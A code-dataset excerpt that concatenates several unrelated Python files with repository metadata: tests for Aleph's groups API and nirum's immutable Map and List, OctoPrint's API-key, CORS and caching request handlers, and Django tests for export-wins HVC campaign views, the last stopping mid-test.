ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
.. codeauthor:: Radu Viorel Cosnita <[email protected]>
.. py:module:: fantastico.routing_engine
''' | mit | 8,748,253,644,158,708,000 | 60.947368 | 126 | 0.793367 | false |
pudo/aleph | aleph/tests/test_groups_api.py | 1 | 1170 | from aleph.core import db
from aleph.model import Role
from aleph.views.util import validate
from aleph.tests.util import TestCase
class GroupsApiTestCase(TestCase):
def setUp(self):
super(GroupsApiTestCase, self).setUp()
self.role = self.create_user(foreign_id='user_1')
group = Role.load_or_create('group_1', Role.GROUP, 'group 1')
self.role.add_role(group)
group = Role.load_or_create('group_2', Role.GROUP, 'group 2')
self.role.add_role(group)
self.other = self.create_user(foreign_id='other')
db.session.commit()
def test_index(self):
res = self.client.get('/api/2/groups')
assert res.status_code == 403, res
_, headers = self.login(foreign_id='user_1')
res = self.client.get('/api/2/groups', headers=headers)
assert res.status_code == 200, res
assert res.json['total'] == 2, res.json
validate(res.json['results'][0], 'Role')
_, headers = self.login(foreign_id='other')
res = self.client.get('/api/2/groups', headers=headers)
assert res.status_code == 200, res
assert res.json['total'] == 0, res.json
| mit | 7,372,743,651,423,293,000 | 38 | 69 | 0.623932 | false |
spoqa/nirum-python | tests/datastructures_test.py | 1 | 4258 | import collections
import pickle
from pytest import raises
from nirum.datastructures import List, Map
def test_map_init():
assert list(Map()) == []
assert (sorted(Map([('a', 1), ('b', 2)]).items()) ==
sorted(Map({'a': 1, 'b': 2}).items()) ==
sorted(Map(Map({'a': 1, 'b': 2})).items()) ==
sorted(Map(a=1, b=2).items()) ==
sorted(Map([('a', 1)], b=2).items()) ==
sorted(Map({'a': 1}, b=2).items()) ==
sorted(Map(Map([('a', 1)]), b=2).items()) ==
[('a', 1), ('b', 2)])
assert isinstance(Map(), collections.Mapping)
assert not isinstance(Map(), collections.MutableMapping)
def test_map_equality(fx_record_type, fx_unboxed_type):
Point = fx_record_type
Offset = fx_unboxed_type
a = Map([
(Offset(1.), Point(left=Offset(1.), top=Offset(2.0))),
(Offset(3.), Point(left=Offset(3.), top=Offset(4.0))),
])
b = Map([
(Offset(1.), Point(left=Offset(1.), top=Offset(2.0))),
(Offset(3.), Point(left=Offset(3.), top=Offset(4.0))),
])
c = Map([
(Offset(1.), Point(left=Offset(1.), top=Offset(2.0))),
(Offset(3.), Point(left=Offset(3.), top=Offset(5.0))),
])
assert a == b
assert not (a != b)
assert hash(a) == hash(b)
assert b != c
assert not (b == c)
assert hash(b) != hash(c)
assert a != c
assert not (a == c)
def test_map_iter():
assert list(Map()) == []
assert list(Map(a=1)) == ['a']
assert list(Map(a=1, b=2)) in (['a', 'b'], ['b', 'a'])
def test_map_len():
assert len(Map()) == 0
assert len(Map(a=1)) == 1
assert len(Map(a=1, b=2)) == 2
def test_map_getitem():
m = Map(a=1, b=2)
assert m['a'] == m.get('a') == m.get('a', 0) == 1
assert m['b'] == m.get('b') == m.get('b', 0) == 2
with raises(KeyError):
m['c']
assert m.get('c') is None
assert m.get('c', 0) == 0
def test_map_contains():
m = Map(a=1, b=2)
assert 'a' in m
assert 'b' in m
assert 'c' not in m
def test_map_pickle():
def p(v):
assert pickle.loads(pickle.dumps(v)) == v
p(Map())
p(Map(a=1))
p(Map(a=1, b=2))
p(Map(d=Map(a=1, b=2)))
def test_map_bool():
assert not Map()
assert Map(a=1)
assert Map(a=1, b=2)
def test_map_repr():
assert repr(Map()) == 'nirum.datastructures.Map()'
assert repr(Map(a=1)) == "nirum.datastructures.Map({'a': 1})"
assert repr(Map(a=1, b=2)) == "nirum.datastructures.Map({'a': 1, 'b': 2})"
def test_list():
immutable_list = List([1, 2])
with raises(AttributeError):
immutable_list.append(1)
with raises(TypeError):
immutable_list + [3]
assert isinstance(immutable_list, collections.Sequence)
assert not isinstance(immutable_list, collections.MutableSequence)
assert immutable_list[0] == 1
assert len(immutable_list) == 2
assert 2 in immutable_list
assert next(iter(immutable_list)) == 1
assert immutable_list.index(2) == 1
assert immutable_list.count(1) == 1
assert immutable_list.count(2) == 1
assert immutable_list.count(3) == 0
def test_list_equality(fx_record_type, fx_unboxed_type):
Point = fx_record_type
Offset = fx_unboxed_type
a = List([
Point(left=Offset(1.), top=Offset(2.)),
Point(left=Offset(3.), top=Offset(4.)),
])
b = List([
Point(left=Offset(1.), top=Offset(2.)),
Point(left=Offset(3.), top=Offset(4.)),
])
c = List([
Point(left=Offset(1.), top=Offset(2.)),
Point(left=Offset(3.), top=Offset(5.)),
])
assert a == b
assert not (a != b)
assert hash(a) == hash(b)
assert b != c
assert not (b == c)
assert hash(b) != hash(c)
assert a != c
assert not (a == c)
def test_list_immutable():
mutable_list = [1, 2]
immutable_list = List(mutable_list)
mutable_list.append(3)
assert immutable_list.items != mutable_list
assert immutable_list.items == [1, 2]
assert mutable_list == [1, 2, 3]
def test_list_repr():
assert repr(List([])) == 'nirum.datastructures.List([])'
assert repr(List([1])) == 'nirum.datastructures.List([1])'
assert repr(List([1, 2])) == 'nirum.datastructures.List([1, 2])'
| mit | -3,196,325,386,247,096,000 | 26.470968 | 78 | 0.546501 | false |
Salandora/OctoPrint | src/octoprint/server/util/__init__.py | 1 | 6142 | # coding=utf-8
from __future__ import absolute_import, division, print_function
__author__ = "Gina Häußge <[email protected]>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
__copyright__ = "Copyright (C) 2014 The OctoPrint Project - Released under terms of the AGPLv3 License"
from octoprint.settings import settings
import octoprint.timelapse
import octoprint.server
from octoprint.users import ApiUser
from octoprint.util import deprecated
import flask as _flask
import flask_login
import flask_principal
from . import flask
from . import sockjs
from . import tornado
from . import watchdog
def enforceApiKeyRequestHandler():
"""
``before_request`` handler for blueprints which makes sure an API key is provided
"""
import octoprint.server
if _flask.request.method == 'OPTIONS':
# we ignore OPTIONS requests here
return
if _flask.request.endpoint and (_flask.request.endpoint == "static" or _flask.request.endpoint.endswith(".static")):
# no further handling for static resources
return
apikey = get_api_key(_flask.request)
if apikey is None:
return _flask.make_response("No API key provided", 401)
if apikey != octoprint.server.UI_API_KEY and not settings().getBoolean(["api", "enabled"]):
# api disabled => 401
return _flask.make_response("API disabled", 401)
apiKeyRequestHandler = deprecated("apiKeyRequestHandler has been renamed to enforceApiKeyRequestHandler")(enforceApiKeyRequestHandler)
def loginFromApiKeyRequestHandler():
"""
``before_request`` handler for blueprints which creates a login session for the provided api key (if available)
UI_API_KEY and app session keys are handled as anonymous keys here and ignored.
"""
apikey = get_api_key(_flask.request)
if apikey and apikey != octoprint.server.UI_API_KEY and not octoprint.server.appSessionManager.validate(apikey):
user = get_user_for_apikey(apikey)
if user is not None and not user.is_anonymous and flask_login.login_user(user, remember=False):
flask_principal.identity_changed.send(_flask.current_app._get_current_object(),
identity=flask_principal.Identity(user.get_id()))
else:
return _flask.make_response("Invalid API key", 401)
def corsRequestHandler():
"""
``before_request`` handler for blueprints which sets CORS headers for OPTIONS requests if enabled
"""
if _flask.request.method == 'OPTIONS' and settings().getBoolean(["api", "allowCrossOrigin"]):
# reply to OPTIONS request for CORS headers
return optionsAllowOrigin(_flask.request)
def corsResponseHandler(resp):
"""
``after_request`` handler for blueprints for which CORS is supported.
Sets ``Access-Control-Allow-Origin`` headers for ``Origin`` request header on response.
"""
# Allow crossdomain
allowCrossOrigin = settings().getBoolean(["api", "allowCrossOrigin"])
if _flask.request.method != 'OPTIONS' and 'Origin' in _flask.request.headers and allowCrossOrigin:
resp.headers['Access-Control-Allow-Origin'] = _flask.request.headers['Origin']
return resp
def noCachingResponseHandler(resp):
"""
``after_request`` handler for blueprints which shall set no caching headers
on their responses.
Sets ``Cache-Control``, ``Pragma`` and ``Expires`` headers accordingly
to prevent all client side caching from taking place.
"""
return flask.add_non_caching_response_headers(resp)
def noCachingExceptGetResponseHandler(resp):
"""
``after_request`` handler for blueprints which shall set no caching headers
on their responses to any requests that are not sent with method ``GET``.
See :func:`noCachingResponseHandler`.
"""
if _flask.request.method == "GET":
return flask.add_no_max_age_response_headers(resp)
else:
return flask.add_non_caching_response_headers(resp)
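# Illustrative sketch (assumed wiring, not taken from OctoPrint itself): the
# handlers above are registered on a Flask blueprint roughly like this; the
# blueprint name "example" is hypothetical.
#
#   import flask
#
#   example = flask.Blueprint("example", __name__)
#   example.before_request(corsRequestHandler)
#   example.before_request(enforceApiKeyRequestHandler)
#   example.after_request(corsResponseHandler)
#   example.after_request(noCachingResponseHandler)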
def optionsAllowOrigin(request):
"""
Shortcut for request handling for CORS OPTIONS requests to set CORS headers.
"""
resp = _flask.current_app.make_default_options_response()
# Allow the origin which made the XHR
resp.headers['Access-Control-Allow-Origin'] = request.headers['Origin']
# Allow the actual method
resp.headers['Access-Control-Allow-Methods'] = request.headers['Access-Control-Request-Method']
# Allow for 10 seconds
resp.headers['Access-Control-Max-Age'] = "10"
# 'preflight' request contains the non-standard headers the real request will have (like X-Api-Key)
customRequestHeaders = request.headers.get('Access-Control-Request-Headers', None)
if customRequestHeaders is not None:
# If present => allow them all
resp.headers['Access-Control-Allow-Headers'] = customRequestHeaders
return resp
def get_user_for_apikey(apikey):
if settings().getBoolean(["api", "enabled"]) and apikey is not None:
if apikey == settings().get(["api", "key"]) or octoprint.server.appSessionManager.validate(apikey):
# master key or an app session key was used
return ApiUser()
elif octoprint.server.userManager.enabled:
# user key might have been used
return octoprint.server.userManager.findUser(apikey=apikey)
return None
def get_api_key(request):
# Check Flask GET/POST arguments
if hasattr(request, "values") and "apikey" in request.values:
return request.values["apikey"]
# Check Tornado GET/POST arguments
if hasattr(request, "arguments") and "apikey" in request.arguments \
and len(request.arguments["apikey"]) > 0 and len(request.arguments["apikey"].strip()) > 0:
return request.arguments["apikey"]
# Check Tornado and Flask headers
if "X-Api-Key" in request.headers.keys():
return request.headers.get("X-Api-Key")
return None
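# Illustrative client calls (hypothetical endpoint): any of these supplies the
# key that get_api_key() extracts above.
#
#   GET /api/version?apikey=<key>                   (Flask/Tornado argument)
#   GET /api/version   with header   X-Api-Key: <key>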
def get_plugin_hash():
from octoprint.plugin import plugin_manager
plugin_signature = lambda impl: "{}:{}".format(impl._identifier, impl._plugin_version)
template_plugins = map(plugin_signature, plugin_manager().get_implementations(octoprint.plugin.TemplatePlugin))
asset_plugins = map(plugin_signature, plugin_manager().get_implementations(octoprint.plugin.AssetPlugin))
ui_plugins = sorted(set(template_plugins + asset_plugins))
import hashlib
plugin_hash = hashlib.sha1()
plugin_hash.update(",".join(ui_plugins))
return plugin_hash.hexdigest()
| agpl-3.0 | -1,420,406,611,270,146,000 | 32.736264 | 134 | 0.744788 | false |
UKTradeInvestment/export-wins-data | mi/tests/test_hvc_views.py | 1 | 42324 | import datetime
from django.test import TestCase
from django.utils.timezone import get_current_timezone
from factory.fuzzy import FuzzyChoice
from freezegun import freeze_time
from django.urls import reverse
from django.core.management import call_command
from fixturedb.factories.win import create_win_factory
from mi.factories import TargetFactory, SectorTeamFactory
from mi.models import FinancialYear, Country, HVCGroup, TargetCountry
from mi.tests.base_test_case import MiApiViewsBaseTestCase, MiApiViewsWithWinsBaseTestCase
from mi.tests.utils import GenericWinTableTestMixin
from wins.constants import SECTORS
from wins.factories import NotificationFactory, HVCFactory
from wins.models import Notification, _get_open_hvcs, normalize_year, HVC
@freeze_time(datetime.datetime(2017, 5, 30, tzinfo=get_current_timezone()))
class HVCBaseViewTestCase(MiApiViewsWithWinsBaseTestCase):
""" HVC Detail page base test case """
view_base_url = reverse('mi:hvc_campaign_detail', kwargs={"campaign_id": "E017"})
export_value = 100000
win_date_2017 = datetime.datetime(2017, 5, 25, tzinfo=get_current_timezone())
win_date_2016 = datetime.datetime(2016, 5, 25, tzinfo=get_current_timezone())
fy_2016_last_date = datetime.datetime(2017, 3, 31, tzinfo=get_current_timezone())
@classmethod
def setUpClass(cls):
super().setUpClass()
call_command('create_missing_hvcs', verbose=False)
def get_url_for_year(self, year, base_url=None):
if not base_url:
base_url = self.view_base_url
return '{base}?year={year}'.format(base=base_url, year=year)
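    # Illustrative result (assumed base URL for this test class): with
    # view_base_url "/mi/hvc/E017/", get_url_for_year(2017) returns
    # "/mi/hvc/E017/?year=2017".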
class HVCDetailsTestCase(HVCBaseViewTestCase):
TEST_CAMPAIGN_ID = "E017"
TARGET_E017_17 = 30000000
PRORATED_TARGET_17 = 2465760 # target based on the frozen date
def setUp(self):
super().setUp()
self._win_factory_function = create_win_factory(
self.user, sector_choices=self.TEAM_1_SECTORS)
self.view_base_url = self.cen_campaign_url
cen_campaign_url = reverse('mi:hvc_campaign_detail', kwargs={"campaign_id": "E017"})
campaign_url_2016_only = reverse('mi:hvc_campaign_detail', kwargs={"campaign_id": "E177"})
campaign_url_2017_only = reverse('mi:hvc_campaign_detail', kwargs={"campaign_id": "E218"})
def test_2017_campaign_in_2016_404(self):
self.view_base_url = self.campaign_url_2017_only
self.url = self.get_url_for_year(2016)
self._get_api_response(self.url, status_code=404)
def test_2016_campaign_in_2017_404(self):
self.view_base_url = self.campaign_url_2016_only
self.url = self.get_url_for_year(2017)
self._get_api_response(self.url, status_code=404)
def test_details_json_2016_no_wins(self):
self.url = self.get_url_for_year(2016)
self.expected_response = {
"wins": {
"totals": {
"value": {
"grand_total": 0,
"unconfirmed": 0,
"confirmed": 0
},
"number": {
"grand_total": 0,
"unconfirmed": 0,
"confirmed": 0
}
},
"progress": {
"status": "red",
"unconfirmed_percent": 0,
"confirmed_percent": 0
}
},
"name": "HVC: E017",
"campaign_id": "E017",
"hvcs": {
"campaigns": [
"HVC: E017",
],
"target": self.CAMPAIGN_TARGET
},
"avg_time_to_confirm": 0.0
}
self.assertResponse()
def test_details_no_wins_2016(self):
self.url = self.get_url_for_year(2016)
api_response = self._api_response_data
self.assertEqual(api_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(api_response["wins"]["totals"]["number"]["grand_total"], 0)
self.assertEqual(api_response["wins"]["progress"]["status"], "red")
self.assertEqual(api_response["wins"]["progress"]["unconfirmed_percent"], 0)
self.assertEqual(api_response["wins"]["progress"]["confirmed_percent"], 0)
def test_details_no_wins_2017(self):
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(api_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(api_response["wins"]["totals"]["number"]["grand_total"], 0)
self.assertEqual(api_response["wins"]["progress"]["status"], "red")
self.assertEqual(api_response["wins"]["progress"]["unconfirmed_percent"], 0)
self.assertEqual(api_response["wins"]["progress"]["confirmed_percent"], 0)
def test_details_e017_hvc_win_for_2017_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
def test_details_cen_hvc_win_for_2017_in_2016(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
def test_details_cen_hvc_win_for_2016_in_2016(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
def test_details_cen_hvc_win_for_2016_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
def test_details_cen_hvc_win_confirmed_in_2016_appears_in_2016(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
def test_details_cen_hvc_win_confirmed_in_2016_doesnt_appears_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
def test_details_cen_hvc_win_from_2016_confirmed_in_2017_doesnt_appears_in_2016(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
response_date=self.win_date_2017,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
def test_details_cen_hvc_win_from_2016_confirmed_in_2017_appears_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
response_date=self.win_date_2017,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
def test_details_hvc_win_from_other_region_but_cen_country_doesnt_appear_in_cen(self):
self._create_hvc_win(
hvc_code='E016',
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
def test_details_hvc_win_from_other_region_other_country_doesnt_appear_in_cen(self):
self._create_hvc_win(
hvc_code='E016',
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='CA'
)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
@freeze_time(MiApiViewsBaseTestCase.frozen_date_17)
def test_details_cen_hvc_win_unconfirmed_in_2016_appears_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
confirm=False,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
def test_details_cen_hvc_win_unconfirmed_in_2017_appears_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=False,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
def test_details_cen_hvc_win_unconfirmed_multi_notifications_no_duplicates(self):
win = self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=False,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
# add couple of customer notifications
notify_date = self.win_date_2017 + datetime.timedelta(days=1)
notification = NotificationFactory(win=win)
notification.type = Notification.TYPE_CUSTOMER
notification.created = notify_date
notification.save()
notify_date = self.win_date_2017 + datetime.timedelta(days=2)
notification = NotificationFactory(win=win)
notification.type = Notification.TYPE_CUSTOMER
notification.created = notify_date
notification.save()
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
@freeze_time(MiApiViewsBaseTestCase.frozen_date_17)
class HVCTopHvcForMarketAndSectorTestCase(HVCBaseViewTestCase):
TEST_CAMPAIGN_ID = "E017"
TARGET_E017_17 = 30000000
PRORATED_TARGET_17 = 2465760 # target based on the frozen date
cen_campaign_url = reverse('mi:hvc_top_wins', kwargs={"campaign_id": "E017"})
campaign_url_2016_only = reverse('mi:hvc_top_wins', kwargs={"campaign_id": "E177"})
campaign_url_2017_only = reverse('mi:hvc_top_wins', kwargs={"campaign_id": "E218"})
expected_response = {}
SECTORS_DICT = dict(SECTORS)
@classmethod
def setUpClass(cls):
super().setUpClass()
call_command('create_missing_hvcs', verbose=False)
def setUp(self):
super().setUp()
self._win_factory_function = create_win_factory(
self.user, sector_choices=self.TEAM_1_SECTORS)
self.view_base_url = self.cen_campaign_url
def test_top_hvc_with_no_wins(self):
""" Top hvc wins will be empty if there are no wins """
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
    def test_top_hvc_with_confirmed_non_hvc_wins(self):
""" Top hvc wins will be empty when there are only confirmed non-hvc wins """
for _ in range(1, 10):
self._create_non_hvc_win(
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
    def test_top_hvc_with_unconfirmed_non_hvc_wins(self):
        """ Top hvc wins will be empty when there are only unconfirmed non-hvc wins """
        for _ in range(1, 10):
            self._create_non_hvc_win(
                win_date=self.win_date_2017,
                confirm=False,
                fin_year=2017,
                export_value=self.export_value,
                country='HU'
            )
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
def test_top_hvc_with_unconfirmed_hvc_wins(self):
""" Top hvc wins consider unconfirmed hvc wins as well """
for _ in range(1, 10):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=False,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response) > 0)
def test_top_hvc_with_confirmed_hvc_wins(self):
""" Top hvc wins consider confirmed hvc wins as well """
for _ in range(1, 10):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response) > 0)
def test_top_hvc_with_confirmed_hvc_wins_one_sector_country(self):
""" Number of Top hvc win items will only be 1
when there are confirmed hvc wins of one country/sector """
for _ in range(1, 10):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
sector_id=self.FIRST_TEAM_1_SECTOR,
country="HU",
confirm=True,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 1)
def test_top_hvc_with_confirmed_hvc_wins_one_country(self):
"""
        Check the number of hvc wins when there are confirmed hvc wins
        across different sectors for one country
"""
for sector_id in range(1, 6):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country="HU",
confirm=True,
sector_id=sector_id,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 5)
def test_top_hvc_with_confirmed_hvc_wins_one_country_more_than_5(self):
"""
        Check that when there are more than 5 hvc wins across different
        sectors for one country, all of them are shown
"""
for sector_id in range(10, 21):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country="HU",
confirm=True,
sector_id=sector_id,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
